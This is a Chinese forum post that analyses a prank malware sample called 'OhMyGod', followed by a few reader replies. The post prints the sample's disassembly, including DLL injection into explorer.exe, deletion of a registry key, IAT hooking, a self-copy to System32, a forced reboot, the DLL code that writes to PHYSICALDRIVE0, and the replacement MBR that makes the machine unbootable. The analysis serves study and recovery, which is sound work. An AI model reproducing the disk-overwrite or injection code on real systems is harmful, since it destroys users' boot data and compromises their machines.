对一个恶意MBR代码的详细分析
本帖最后由 JoyChou 于 2013-7-14 18:21 编辑基本信息:报告名称:OhMyGod病毒分析
作者:JoyChou
样本类型:MBR感染
样本文件大小:268 KB (274,432 字节)
样本MD5:3AE53CB468E2DF56A3E424E934BF30CF
壳信息:无壳
简介
该样本是一个修改MBR的玩笑病毒。
被感染的系统症状
感染该样本后,重启电脑电脑将无法正常启动,只会显示一窜字符串。
文件系统变化
修改MBR,释放rand().txt以及rand().dll
注册表变化
删除HKEN_CURRENT_USER子健Keyboard Layout\Preload,删除输入法
网络症状无
来到OEP,看到几个关键call,每个都详细分析下
004017A0/$E8 FBFEFFFF call OhMyGod.004016A0
004017A5|.E8 76FDFFFF call OhMyGod.00401520
004017AA|.E8 A1F8FFFF call OhMyGod.00401050
004017AF|.E8 5CFDFFFF call OhMyGod.00401510
004017B4|.E8 C7F8FFFF call OhMyGod.00401080
004017B9|.E8 92F9FFFF call OhMyGod.00401150
004017BE|.E8 0DFFFFFF call OhMyGod.004016D0
004017C3|.E8 58F8FFFF call OhMyGod.00401020
004017C8|.6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
004017CA|.68 1C914000 push OhMyGod.0040911C ; |111
004017CF|.68 14914000 push OhMyGod.00409114 ; |Good
004017D4|.6A 00 push 0x0 ; |hOwner = NULL
004017D6|.FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
004017DC|.E8 EFFAFFFF call OhMyGod.004012D0
004017E1|.6A 00 push 0x0
004017E3|.6A 02 push 0x2
004017E5|.E8 B6FCFFFF call OhMyGod.004014A0
004017EA|.83C4 08 add esp,0x8
004017ED\.C3 retn
004017A0/$E8 FBFEFFFF call OhMyGod.004016A0 这个call 进入
004016A0|$6A 00 push 0x0 ; /pThreadId = NULL
004016A2|.6A 00 push 0x0 ; |CreationFlags = 0
004016A4|.6A 00 push 0x0 ; |pThreadParm = NULL
004016A6|.68 60154000 push OhMyGod.00401560 ; |创建一个线程,来到线程函数
004016AB|.6A 00 push 0x0 ; |StackSize = 0
004016AD|.6A 00 push 0x0 ; |pSecurity = NULL
004016AF|.FF15 74804000 call dword ptr ds:[<&KERNEL32.CreateThre>; \CreateThread
004016B5|.50 push eax ; /hObject
004016B6|.FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
004016BC\.^ E9 CFFFFFFF jmp OhMyGod.00401690
我们来到线程函数
00401560 .83EC 0C sub esp,0xC
00401563 .53 push ebx
00401564 .55 push ebp
00401565 .56 push esi
00401566 .57 push edi
00401567 .E8 E4FAFFFF call OhMyGod.00401050 ;//删除注册表信息(这个call就没有进去了,很简单的)
0040156C .33DB xor ebx,ebx
0040156E .68 3F000F00 push 0xF003F
00401573 .53 push ebx
00401574 .53 push ebx
00401575 .FF15 04804000 call dword ptr ds:[<&ADVAPI32.OpenSCMana>;打开服务管理器,SCM是服务管理器的意思
0040157B .8BE8 mov ebp,eax
0040157D .3BEB cmp ebp,ebx
0040157F .75 0C jnz XOhMyGod.0040158D
00401581 .5F pop edi
00401582 .5E pop esi
00401583 .5D pop ebp
00401584 .33C0 xor eax,eax
00401586 .5B pop ebx
00401587 .83C4 0C add esp,0xC
0040158A .C2 0400 retn 0x4
0040158D >8D4424 14 lea eax,dword ptr ss:
00401591 .8B3D 08804000 mov edi,dword ptr ds:[<&ADVAPI32.EnumSer>;advapi32.EnumServicesStatusA
00401597 .53 push ebx ; /pResumeHandle
00401598 .8D4C24 14 lea ecx,dword ptr ss: ; |
0040159C .50 push eax ; |pCount
0040159D .51 push ecx ; |pBytesNeeded
0040159E .53 push ebx ; |BufSize
0040159F .53 push ebx ; |pEnumStatus
004015A0 .6A 03 push 0x3 ; |ServiceState = 3
004015A2 .6A 3B push 0x3B ; |ServiceType = SERVICE_KERNEL_DRIVER|SERVICE_FILE_SYSTEM_DRIVER|SERVICE_RECOGNIZER_DRIVER|SERVICE_WIN32_OWN_PROCESS|SERVICE_WIN32_SHARE_PROCESS
004015A4 .55 push ebp ; |hManager
004015A5 .895C24 34 mov dword ptr ss:,ebx ; |
004015A9 .895C24 30 mov dword ptr ss:,ebx ; |
004015AD .FFD7 call edi ; \枚举服务
004015AF .8B5424 10 mov edx,dword ptr ss:
004015B3 .52 push edx ; /Size
004015B4 .6A 40 push 0x40 ; |Flags = LPTR
004015B6 .FF15 70804000 call dword ptr ds:[<&KERNEL32.LocalAlloc>; \LocalAlloc;分配内存
004015BC .8BF0 mov esi,eax
004015BE .3BF3 cmp esi,ebx
004015C0 .75 13 jnz XOhMyGod.004015D5
004015C2 .55 push ebp
004015C3 .FF15 0C804000 call dword ptr ds:[<&ADVAPI32.CloseServi>;关闭服务
004015C9 .5F pop edi
004015CA .5E pop esi
004015CB .5D pop ebp
004015CC .33C0 xor eax,eax
004015CE .5B pop ebx
004015CF .83C4 0C add esp,0xC
004015D2 .C2 0400 retn 0x4
下面来看第二个call
004017A5|.E8 76FDFFFF call OhMyGod.00401520
我们进入
00401520/$68 E0904000 push OhMyGod.004090E0 ; /jinguizi
00401525|.6A 00 push 0x0 ; |InitialOwner = FALSE
00401527|.6A 00 push 0x0 ; |pSecurity = NULL
00401529|.FF15 68804000 call dword ptr ds:[<&KERNEL32.CreateMute>; \创建一个名为JinGuiZi的互斥对象,功能只能运行一次当前程序,不能双开
0040152F|.85C0 test eax,eax
00401531|.74 26 je XOhMyGod.00401559
00401533|.FF15 C0804000 call dword ptr ds:[<&KERNEL32.GetLastErr>; [GetLastError
00401539|.3D B7000000 cmp eax,0xB7
0040153E|.75 19 jnz XOhMyGod.00401559
00401540|.6A 00 push 0x0 ; /Style = MB_OK|MB_APPLMODAL
00401542|.6A 00 push 0x0 ; |Title = NULL
00401544|.68 CC904000 push OhMyGod.004090CC ; |只能有一个程序运行
00401549|.6A 00 push 0x0 ; |hOwner = NULL
0040154B|.FF15 5C814000 call dword ptr ds:[<&USER32.MessageBoxA>>; \MessageBoxA
00401551|.6A 00 push 0x0 ; /ExitCode = 0
00401553|.FF15 60804000 call dword ptr ds:[<&KERNEL32.ExitProces>; \ExitProcess
00401559\>C3 retn
下面我们进入004017AA|.E8 A1F8FFFF call OhMyGod.00401050第三个call
还是打开注册表,删除子键
00401050/$51 push ecx ;删除HKEN_CURRENT_USER子健Keyboard Layout\Preload
00401051|.8D4424 00 lea eax,dword ptr ss:
00401055|.50 push eax ; /pHandle
00401056|.6A 08 push 0x8 ; |Access = KEY_ENUMERATE_SUB_KEYS
00401058|.6A 00 push 0x0 ; |Reserved = 0
0040105A|.68 44904000 push OhMyGod.00409044 ; |Keyboard Layout\Preload
0040105F|.68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401064|.FF15 1C804000 call dword ptr ds:[<&ADVAPI32.RegOpenKey>; \RegOpenKeyExA
0040106A|.68 44904000 push OhMyGod.00409044 ; /Keyboard Layout\Preload
0040106F|.68 01000080 push 0x80000001 ; |hKey = HKEY_CURRENT_USER
00401074|.FF15 20804000 call dword ptr ds:[<&ADVAPI32.RegDeleteK>; \RegDeleteKeyA
0040107A|.59 pop ecx
0040107B\.C3 retn
下面看004017AF|.E8 5CFDFFFF call OhMyGod.00401510第四个call
00401510/$6A 00 push 0x0 ; /Enable = FALSE
00401512|.FF15 60814000 call dword ptr ds:[<&USER32.GetForegroun>; |[GetForegroundWindow
00401518|.50 push eax ; |hWnd
00401519|.FF15 50814000 call dword ptr ds:[<&USER32.EnableWindow>; \EnableWindow
0040151F\.C3 retn
再看004017B4|.E8 C7F8FFFF call OhMyGod.00401080第五个call
00401080/$81EC 04010000 sub esp,0x104
00401086|.8D4424 04 lea eax,dword ptr ss:
0040108A|.68 00050000 push 0x500 ; /BufSize = 500 (1280.)
0040108F|.50 push eax ; |Buffer
00401090|.FF15 B4804000 call dword ptr ds:[<&KERNEL32.GetWindows>; \GetWindowsDirectoryA
00401096|.85C0 test eax,eax
00401098|.75 14 jnz XOhMyGod.004010AE
0040109A|.68 78904000 push OhMyGod.00409078
0040109F|.E8 62080000 call OhMyGod.00401906
004010A4|.83C4 04 add esp,0x4
004010A7|.81C4 04010000 add esp,0x104
004010AD|.C3 retn
004010AE|>56 push esi
004010AF|.6A 00 push 0x0
004010B1|.E8 74070000 call OhMyGod.0040182A
004010B6|.50 push eax
004010B7|.E8 46070000 call OhMyGod.00401802
004010BC|.E8 4B070000 call OhMyGod.0040180C ;获取一个随机数,然后以这个随机数命名新建的txt,YY用
004010C1|.8D4C24 10 lea ecx,dword ptr ss:
004010C5|.68 0C184000 push OhMyGod.0040180C ; /<%ld> = 40180C (4200460.)
004010CA|.51 push ecx ; |<%s>
004010CB|.8D9424 980000>lea edx,dword ptr ss: ; |
004010D2|.68 6C904000 push OhMyGod.0040906C ; |Format = "%s\%ld.txt"
004010D7|.52 push edx ; |s
004010D8|.FF15 58814000 call dword ptr ds:[<&USER32.wsprintfA>]; \wsprintfA
004010DE|.83C4 18 add esp,0x18
004010E1|.8D8424 880000>lea eax,dword ptr ss: ;在windows目录下创建rand().txt文件
004010E8|.6A 00 push 0x0 ; /hTemplateFile = NULL
004010EA|.68 80000000 push 0x80 ; |Attributes = NORMAL
004010EF|.6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
004010F1|.6A 00 push 0x0 ; |pSecurity = NULL
004010F3|.6A 02 push 0x2 ; |ShareMode = FILE_SHARE_WRITE
004010F5|.68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
004010FA|.50 push eax ; |FileName
004010FB|.FF15 B8804000 call dword ptr ds:[<&KERNEL32.CreateFile>; \CreateFileA
00401101|.8D4C24 04 lea ecx,dword ptr ss: ;写入“金龟子真棒”
00401105|.6A 00 push 0x0 ; /pOverlapped = NULL
00401107|.51 push ecx ; |pBytesWritten
00401108|.8BF0 mov esi,eax ; |
0040110A|.6A 0E push 0xE ; |nBytesToWrite = E (14.)
0040110C|.68 5C904000 push OhMyGod.0040905C ; |Buffer = OhMyGod.0040905C
00401111|.56 push esi ; |hFile
00401112|.FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>>; \WriteFile
00401118|.56 push esi ; /hObject
00401119|.FF15 B0804000 call dword ptr ds:[<&KERNEL32.CloseHandl>; \CloseHandle
0040111F|.E8 2CFFFFFF call OhMyGod.00401050
00401124|.5E pop esi
00401125|.81C4 04010000 add esp,0x104
0040112B\.C3 retn
我们进去这个004010B1|.E8 74070000 call OhMyGod.0040182A看下
获取随机数
在看第六个call之前,我们看下母本的输入表
接着,继续
00401150/$83EC 24 sub esp,0x24
00401153|.53 push ebx
00401154|.56 push esi
00401155|.57 push edi ;获取当前进程
00401156|.6A 00 push 0x0 ; /pModule = NULL
00401158|.FF15 64804000 call dword ptr ds:[<&KERNEL32.GetModuleHandleA>] ; \GetModuleHandleA
0040115E|.8BF8 mov edi,eax
00401160|.8B47 3C mov eax,dword ptr ds: ;获取PE头
00401163|.8BB438 800000>mov esi,dword ptr ds: ;获取输入表
0040116A|.8B443E 10 mov eax,dword ptr ds: ;获取IAT
0040116E|.03F7 add esi,edi
00401170|.85C0 test eax,eax
00401172|.74 21 je XOhMyGod.00401195
00401174|.8B1D 9C804000 mov ebx,dword ptr ds:[<&KERNEL32.lstrcmpiA>] ;将lstrcmpiA函数地址给ebx
0040117A|>8B46 0C /mov eax,dword ptr ds: ;获取输入表名字
0040117D|.68 8C904000 |push OhMyGod.0040908C ;ASCII "USER32.DLL"
00401182|.03C7 |add eax,edi
00401184|.50 |push eax
00401185|.FFD3 |call ebx
00401187|.85C0 |test eax,eax ;判断是否为user32.dll
00401189|.74 0A |je XOhMyGod.00401195
0040118B|.8B46 24 |mov eax,dword ptr ds:
0040118E|.83C6 14 |add esi,0x14 ;加上一整个输入表的大小0x14
00401191|.85C0 |test eax,eax
00401193|.^ 75 E5 \jnz XOhMyGod.0040117A
00401195|>8B76 10 mov esi,dword ptr ds: ;将user32.dll的IAT给esi
00401198|.85F6 test esi,esi
0040119A|.74 6C je XOhMyGod.00401208
0040119C|.8B043E mov eax,dword ptr ds:
0040119F|.03F7 add esi,edi
004011A1|.85C0 test eax,eax
004011A3|.74 63 je XOhMyGod.00401208
004011A5|.8B1D A0804000 mov ebx,dword ptr ds:[<&KERNEL32.VirtualQuery>] ;kernel32.VirtualQuery
004011AB|.8B3D A4804000 mov edi,dword ptr ds:[<&KERNEL32.VirtualProtect>] ;kernel32.VirtualProtect
004011B1|.55 push ebp
004011B2|.8B2D A8804000 mov ebp,dword ptr ds:[<&KERNEL32.WriteProcessMemory>] ;kernel32.WriteProcessMemory
004011B8|>3B05 E8BA4000 /cmp eax,dword ptr ds: ;user32.MessageBoxA
004011BE|.75 3D |jnz XOhMyGod.004011FD
004011C0|.8D4C24 18 |lea ecx,dword ptr ss:
004011C4|.6A 1C |push 0x1C
004011C6|.51 |push ecx
004011C7|.56 |push esi
004011C8|.FFD3 |call ebx ;// VirtualQuery
004011CA|.8D5424 14 |lea edx,dword ptr ss:
004011CE|.52 |push edx
004011CF|.6A 04 |push 0x4
004011D1|.6A 04 |push 0x4
004011D3|.56 |push esi
004011D4|.FFD7 |call edi ;// VirtualProtect
004011D6|.6A 00 |push 0x0
004011D8|.8D4424 14 |lea eax,dword ptr ss:
004011DC|.6A 04 |push 0x4 ;4个字节大小
004011DE|.50 |push eax ;将MessageBoxA函数地址入栈
004011DF|.56 |push esi
004011E0|.C74424 20 301>|mov dword ptr ss:,OhMyGod.00401130
004011E8|.FF15 AC804000 |call dword ptr ds:[<&KERNEL32.GetCurrentProcess>] ; GetCurrentProcess
004011EE|.50 |push eax
004011EF|.FFD5 |call ebp ;// WriteProcessMerory
004011F1|.8B4C24 14 |mov ecx,dword ptr ss: ;将MessageBoxA函数地址写入到esi
004011F5|.6A 00 |push 0x0
004011F7|.51 |push ecx
004011F8|.6A 04 |push 0x4
004011FA|.56 |push esi
004011FB|.FFD7 |call edi ;// VirtualProtect
004011FD|>8B46 04 |mov eax,dword ptr ds: ;找到MessageBoxA函数地址,在弹出goodjob的时候就利用这个地址
00401200|.83C6 04 |add esi,0x4
00401203|.85C0 |test eax,eax
00401205|.^ 75 B1 \jnz XOhMyGod.004011B8
00401207|.5D pop ebp
00401208|>5F pop edi
00401209|.5E pop esi
0040120A|.5B pop ebx
0040120B|.83C4 24 add esp,0x24
0040120E\.C3 retn
下面看第七个call004017BE|.E8 0DFFFFFF call OhMyGod.004016D0
进去
过程是,先获取当前出现名字,打开文件,获取文件大小,申请一块文件大小的空间,
再把申请的地址内容全部读入到一个buffer,最后写入到创建的GuiZi.exe完成自我复制的功能。
004016D0/$81EC 84000000 sub esp,0x84 ;作者本意是复制自己文件到系统目录下的GuiZi.exe,可是,没成功
没成功的原因是:CreateFile API第二个参数应该是GENERIC_READ,因为要读取
004016D6|.53 push ebx ;不过为什么不直接用CopyFile呢
004016D7|.56 push esi
004016D8|.57 push edi
004016D9|.B9 1F000000 mov ecx,0x1F
004016DE|.33C0 xor eax,eax
004016E0|.8D7C24 11 lea edi,dword ptr ss:
004016E4|.C64424 10 00mov byte ptr ss:,0x0
004016E9|.68 80000000 push 0x80 ; /BufSize = 80 (128.)
004016EE|.F3:AB rep stos dword ptr es: ; |
004016F0|.66:AB stos word ptr es: ; |
004016F2|.AA stos byte ptr es: ; |
004016F3|.8D4424 14 lea eax,dword ptr ss: ; |
004016F7|.50 push eax ; |PathBuffer
004016F8|.6A 00 push 0x0 ; |hModule = NULL
004016FA|.FF15 80804000 call dword ptr ds:[<&KERNEL32.GetModuleFileNameA>>; \GetModuleFileNameA
00401700|.8B1D B8804000 mov ebx,dword ptr ds:[<&KERNEL32.CreateFileA>] ;kernel32.CreateFileA
00401706|.6A 00 push 0x0 ; /hTemplateFile = NULL
00401708|.68 80000000 push 0x80 ; |Attributes = NORMAL
0040170D|.6A 03 push 0x3 ; |Mode = OPEN_EXISTING
0040170F|.6A 00 push 0x0 ; |pSecurity = NULL
00401711|.6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401713|.8D4C24 24 lea ecx,dword ptr ss: ; |
00401717|.68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040171C|.51 push ecx ; |FileName
0040171D|.FFD3 call ebx ; \CreateFileA
0040171F|.8D5424 0C lea edx,dword ptr ss:
00401723|.8BF0 mov esi,eax
00401725|.52 push edx ; /pFileSizeHigh
00401726|.56 push esi ; |hFile
00401727|.FF15 7C804000 call dword ptr ds:[<&KERNEL32.GetFileSize>] ; \GetFileSize
0040172D|.8B4424 0C mov eax,dword ptr ss:
00401731|.6A 04 push 0x4 ; /flProtect = 4
00401733|.68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401738|.50 push eax ; |dwSize
00401739|.6A 00 push 0x0 ; |lpAddress = NULL
0040173B|.6A 00 push 0x0 ; |hProcess = NULL
0040173D|.FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAllocEx>] ; \VirtualAllocEx
00401743|.8B5424 0C mov edx,dword ptr ss:
00401747|.8D4C24 0C lea ecx,dword ptr ss:
0040174B|.6A 00 push 0x0 ; /pOverlapped = NULL
0040174D|.8BF8 mov edi,eax ; |
0040174F|.51 push ecx ; |pBytesRead
00401750|.52 push edx ; |BytesToRead
00401751|.57 push edi ; |Buffer
00401752|.56 push esi ; |hFile
00401753|.FF15 78804000 call dword ptr ds:[<&KERNEL32.ReadFile>] ; \ReadFile
00401759|.6A 00 push 0x0 ; /hTemplateFile = NULL
0040175B|.68 80000000 push 0x80 ; |Attributes = NORMAL
00401760|.6A 02 push 0x2 ; |Mode = CREATE_ALWAYS
00401762|.6A 00 push 0x0 ; |pSecurity = NULL
00401764|.6A 03 push 0x3 ; |ShareMode = FILE_SHARE_READ|FILE_SHARE_WRITE
00401766|.68 00000010 push 0x10000000 ; |Access = GENERIC_ALL
0040176B|.68 F4904000 push OhMyGod.004090F4 ; |FileName = "C:\WINDOWS\SYSTEM32\GuiZi.exe"
00401770|.FFD3 call ebx ; \CreateFileA
00401772|.8B4C24 0C mov ecx,dword ptr ss:
00401776|.8BD8 mov ebx,eax
00401778|.8D4424 0C lea eax,dword ptr ss:
0040177C|.6A 00 push 0x0 ; /pOverlapped = NULL
0040177E|.50 push eax ; |pBytesWritten
0040177F|.51 push ecx ; |nBytesToWrite
00401780|.57 push edi ; |Buffer
00401781|.53 push ebx ; |hFile
00401782|.FF15 BC804000 call dword ptr ds:[<&KERNEL32.WriteFile>] ; \WriteFile
00401788|.8B3D B0804000 mov edi,dword ptr ds:[<&KERNEL32.CloseHandle>] ;kernel32.CloseHandle
0040178E|.53 push ebx ; /hObject
0040178F|.FFD7 call edi ; \CloseHandle
00401791|.56 push esi ; /hObject
00401792|.FFD7 call edi ; \CloseHandle
00401794|.5F pop edi
00401795|.5E pop esi
00401796|.5B pop ebx ;7FFDE000
00401797|.81C4 84000000 add esp,0x84
0040179D\.C3 retn
再看第八个call004017C3|.E8 58F8FFFF call OhMyGod.00401020
完成对ASCII "Shabisafhlfiakhfdka"解密, “Shbeo}p{剱摖9孟 荏?K”,目测是个干扰,没用的地方
第9个call就弹一个提示框,我们跳过
再看第十个call 004017DC|.E8 EFFAFFFF call OhMyGod.004012D0 这个call
功能:创建一个rand().dll,并LoadLibraryA(rand().dll),注入到桌面进程,方便系统中招。
004012D0/$81EC 28010000 sub esp,0x128
004012D6|.53 push ebx
004012D7|.55 push ebp
004012D8|.56 push esi
004012D9|.57 push edi
004012DA|.33FF xor edi,edi
004012DC|.C74424 10 280>mov dword ptr ss:,0x128
004012E4|.57 push edi ; /ProcessID => 0
004012E5|.6A 02 push 0x2 ; |Flags = TH32CS_SNAPPROCESS
004012E7|.E8 10050000 call <jmp.&KERNEL32.CreateToolhelp32Snap>; \CreateToolhelp32Snapshot
004012EC|.8BE8 mov ebp,eax
004012EE|.8D4424 10 lea eax,dword ptr ss:
004012F2|.50 push eax ; /lppe
004012F3|.55 push ebp ; |hSnapshot
004012F4|.E8 FD040000 call <jmp.&KERNEL32.Process32First> ; \Process32First
004012F9|.85C0 test eax,eax
004012FB|.74 4F je XOhMyGod.0040134C
004012FD|>BE A8904000 /mov esi,OhMyGod.004090A8 ;ASCII "explorer.exe"
00401302|.8D4424 34 |lea eax,dword ptr ss:
00401306|>8A10 |/mov dl,byte ptr ds:
00401308|.8A1E ||mov bl,byte ptr ds:
0040130A|.8ACA ||mov cl,dl
0040130C|.3AD3 ||cmp dl,bl
0040130E|.75 1E ||jnz XOhMyGod.0040132E
00401310|.84C9 ||test cl,cl
00401312|.74 16 ||je XOhMyGod.0040132A
00401314|.8A50 01 ||mov dl,byte ptr ds:
00401317|.8A5E 01 ||mov bl,byte ptr ds:
0040131A|.8ACA ||mov cl,dl
0040131C|.3AD3 ||cmp dl,bl
0040131E|.75 0E ||jnz XOhMyGod.0040132E
00401320|.83C0 02 ||add eax,0x2
00401323|.83C6 02 ||add esi,0x2
00401326|.84C9 ||test cl,cl
00401328|.^ 75 DC |\jnz XOhMyGod.00401306
0040132A|>33C0 |xor eax,eax
0040132C|.EB 05 |jmp XOhMyGod.00401333
0040132E|>1BC0 |sbb eax,eax
00401330|.83D8 FF |sbb eax,-0x1
00401333|>85C0 |test eax,eax
00401335|.74 11 |je XOhMyGod.00401348
00401337|.8D4424 10 |lea eax,dword ptr ss:
0040133B|.50 |push eax ; /lppe
0040133C|.55 |push ebp ; |hSnapshot
0040133D|.E8 AE040000 |call <jmp.&KERNEL32.Process32Next> ; \Process32Next
00401342|.85C0 |test eax,eax
00401344|.^ 75 B7 \jnz XOhMyGod.004012FD
00401346|.EB 04 jmp XOhMyGod.0040134C
00401348|>8B7C24 18 mov edi,dword ptr ss:
0040134C|>57 push edi ; /ProcessId
0040134D|.6A 00 push 0x0 ; |Inheritable = FALSE
0040134F|.68 FF0F1F00 push 0x1F0FFF ; |Access = PROCESS_ALL_ACCESS
00401354|.FF15 4C804000 call dword ptr ds:[<&KERNEL32.OpenProces>; \OpenProcess
0040135A|.8BF0 mov esi,eax
0040135C|.E8 AFFEFFFF call OhMyGod.00401210 ;在系统目录创建一个rand().dll,写入MBR使用
00401361|.8BD8 mov ebx,eax
00401363|.83C9 FF or ecx,0xFFFFFFFF
00401366|.8BFB mov edi,ebx
00401368|.33C0 xor eax,eax
0040136A|.F2:AE repne scas byte ptr es:
0040136C|.F7D1 not ecx
0040136E|.6A 04 push 0x4 ; /flProtect = 4
00401370|.49 dec ecx ; |
00401371|.68 00100000 push 0x1000 ; |flAllocationType = 1000 (4096.)
00401376|.51 push ecx ; |dwSize
00401377|.50 push eax ; |lpAddress => NULL
00401378|.56 push esi ; |hProcess
00401379|.FF15 48804000 call dword ptr ds:[<&KERNEL32.VirtualAll>; \VirtualAllocEx
0040137F|.8BE8 mov ebp,eax
00401381|.8BFB mov edi,ebx
00401383|.83C9 FF or ecx,0xFFFFFFFF
00401386|.33C0 xor eax,eax
00401388|.F2:AE repne scas byte ptr es:
0040138A|.F7D1 not ecx
0040138C|.49 dec ecx
0040138D|.6A 00 push 0x0 ; /pBytesWritten = NULL
0040138F|.51 push ecx ; |BytesToWrite
00401390|.53 push ebx ; |Buffer
00401391|.55 push ebp ; |Address
00401392|.56 push esi ; |hProcess
00401393|.FF15 A8804000 call dword ptr ds:[<&KERNEL32.WriteProce>; \WriteProcessMemory
00401399|.8B0D 44804000 mov ecx,dword ptr ds:[<&KERNEL32.LoadLib>;kernel32.LoadLibraryA
0040139F|.6A 00 push 0x0 ; /lpThreadId = NULL
004013A1|.6A 00 push 0x0 ; |dwCreationFlags = 0
004013A3|.55 push ebp ; |lpParameter
004013A4|.51 push ecx ; |lpStartAddress => kernel32.LoadLibraryA
004013A5|.6A 00 push 0x0 ; |dwStackSize = 0
004013A7|.6A 00 push 0x0 ; |lpThreadAttributes
004013A9|.56 push esi ; |hProcess
004013AA|.FF15 40804000 call dword ptr ds:[<&KERNEL32.CreateRemo>; \CreateRemoteThread
004013B0|.8BF8 mov edi,eax
004013B2|.6A FF push -0x1 ; /Timeout = INFINITE
004013B4|.57 push edi ; |hObject
004013B5|.FF15 3C804000 call dword ptr ds:[<&KERNEL32.WaitForSin>; \WaitForSingleObject
004013BB|.68 00800000 push 0x8000 ; /dwFreeType = 8000 (32768.)
004013C0|.6A 00 push 0x0 ; |dwSize = 0
004013C2|.55 push ebp ; |lpAddress
004013C3|.56 push esi ; |hProcess
004013C4|.FF15 38804000 call dword ptr ds:[<&KERNEL32.VirtualFre>; \VirtualFreeEx
004013CA|.56 push esi ; /hObject
004013CB|.8B35 B0804000 mov esi,dword ptr ds:[<&KERNEL32.CloseHa>; |kernel32.CloseHandle
004013D1|.FFD6 call esi ; \CloseHandle
004013D3|.57 push edi ; /hObject
004013D4|.FFD6 call esi ; \CloseHandle
004013D6|.5F pop edi
004013D7|.5E pop esi
004013D8|.5D pop ebp
004013D9|.5B pop ebx
004013DA|.81C4 28010000 add esp,0x128
004013E0\.C3 retn
看最后一个call 004017E5|.E8 B6FCFFFF call OhMyGod.004014A0
获取系统版本,然后重启,当然MBR被恶意修改了,就不能进入系统了
004014A0/$8B4424 04 mov eax,dword ptr ss:
004014A4|.81EC 94000000 sub esp,0x94
004014AA|.85C0 test eax,eax
004014AC|.74 13 je XOhMyGod.004014C1
004014AE|.83F8 02 cmp eax,0x2
004014B1|.74 0E je XOhMyGod.004014C1
004014B3|.83F8 01 cmp eax,0x1
004014B6|.74 09 je XOhMyGod.004014C1
004014B8|.33C0 xor eax,eax
004014BA|.81C4 94000000 add esp,0x94
004014C0|.C3 retn
004014C1|>57 push edi
004014C2|.B9 24000000 mov ecx,0x24
004014C7|.33C0 xor eax,eax
004014C9|.8D7C24 08 lea edi,dword ptr ss:
004014CD|.F3:AB rep stos dword ptr es:
004014CF|.8D4424 04 lea eax,dword ptr ss:
004014D3|.C74424 04 940>mov dword ptr ss:,0x94
004014DB|.50 push eax ; /pVersionInformation
004014DC|.FF15 5C804000 call dword ptr ds:[<&KERNEL32.GetVersion>; \GetVersionExA
004014E2|.85C0 test eax,eax
004014E4|.5F pop edi
004014E5|.75 07 jnz XOhMyGod.004014EE
004014E7|.81C4 94000000 add esp,0x94
004014ED|.C3 retn
004014EE|>837C24 10 02cmp dword ptr ss:,0x2
004014F3|.75 05 jnz XOhMyGod.004014FA
004014F5|.E8 F6FEFFFF call OhMyGod.004013F0
004014FA|>6A 00 push 0x0 ; /Reserved = 0
004014FC|.6A 06 push 0x6 ; |Options = EWX_REBOOT|EWX_FORCE
004014FE|.FF15 54814000 call dword ptr ds:[<&USER32.ExitWindowsE>; \ExitWindowsEx
00401504|.81C4 94000000 add esp,0x94
0040150A\.C3 retn
在看MBR之前,我们看下那个dll,用IDA静态看下
发现只有DllMain一个函数,发现是这个样子
strcpy((char *)FileName, "\\\\.\\PHYSICALDRIVE0");
CreateFileA(FileName, 0xC0000000u, 0, 0, 3u, 0x80u, 0);
WriteFile(hObject, &Buffer, 0x200u, &NumberOfBytesWritten, 0);
此时我们再用winhex到处MBR,IDA静态分析下,详细的MBR学习请转帖到willJ大大的MBR学习哦
;org 7C00h
seg000:7C00 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
seg000:7C00 B8 12 00 mov ax, 12h ; 设置显示器模式,12H:640×480 16色
seg000:7C03 CD 10 int 10h ; - VIDEO - SET VIDEO MODE
seg000:7C03 ; AL = mode
seg000:7C05 BD 18 7C mov bp, 7C18h ; es:bp字符串的地址
seg000:7C08 B9 13 00 mov cx, 13h ; 显示字符串长度为0x13
seg000:7C0B B8 01 13 mov ax, 1301h ; ah = 13h,al = 01h 表示执行int10中断的13号程序功能(在Teletype模式下显示字符串)
seg000:7C0E BB 0C 00 mov bx, 0Ch ; bl=0Ch,表示属性,背景色为黑色,字体颜色为淡红色
seg000:7C11 BA 00 00 mov dx, 0 ; dh = 0;表示第0列第0行
seg000:7C14 CD 10 int 10h ; - VIDEO - WRITE STRING (AT,XT286,PS,EGA,VGA)
seg000:7C14 ; AL = mode, BL = attribute if AL bit 1 clear, BH = display page number
seg000:7C14 ; DH,DL = row,column of starting cursor position, CX = length of string
seg000:7C14 ; ES:BP -> start of string
seg000:7C14 ; ---------------------------------------------------------------------------
seg000:7C16 E2 FE loop loc_7C16 ; 死循环
seg000:7C16 ; ---------------------------------------------------------------------------
seg000:7C18 68 61 63 6B 65 64 20 62+aHackedByJingui db 'hacked by JinGuiZi ' ; 要显示的字符串
MBR最后两位0x55,0xAA
seg000:7DFE 55 db55h ; U
seg000:7DFF AA db 0AAh ;
最后看下效果
预防和修复
MBR恢复可以看下http://www.52pojie.cn/thread-188123-1-1.htmlwillJ大大的这个帖子
删除系统目下的GuiZi.exe以及windows目录下的rand().dll
注册表进行恢复
附件:
密码 "52pojie"
PS:XP成功,win7完蛋。
总结:此样本的方法就是创建一个dll,去注入桌面这个万能的进程,当我们操作桌面的时候,就成功加载这个dll,就对MBR进行写入,然后动态获取MessageBoxA的地址用的shellcode的方式(读取输入表),获取,比较隐秘,不过对于动态调试就无力了,是一种hook API的方法,也学习了一种方法,很不错。其他的应该都是干扰信息,我们不用理会。
慢慢学吧 楼主 对函数分析的很透彻 ,对汇编 也很了解 ,支持你 好好 好 不错 大家可不要利用这些来做坏事,结果会很严重 纯膜拜加支持,这得多好的汇编理解啊。。。 那这个给一些一窍不懂电脑的打开,这不是以为电脑坏了,有要钱去修了,很悲催。 这个样本是金龟子写的?
那些注册表操作,服务操作有什么目的?
整个样本的目的只是恶作剧?目的? willJ 发表于 2013-7-11 20:49 static/image/common/back.gif
这个样本是金龟子写的?
那些注册表操作,服务操作有什么目的?
整个样本的目的只是恶作剧?目的?
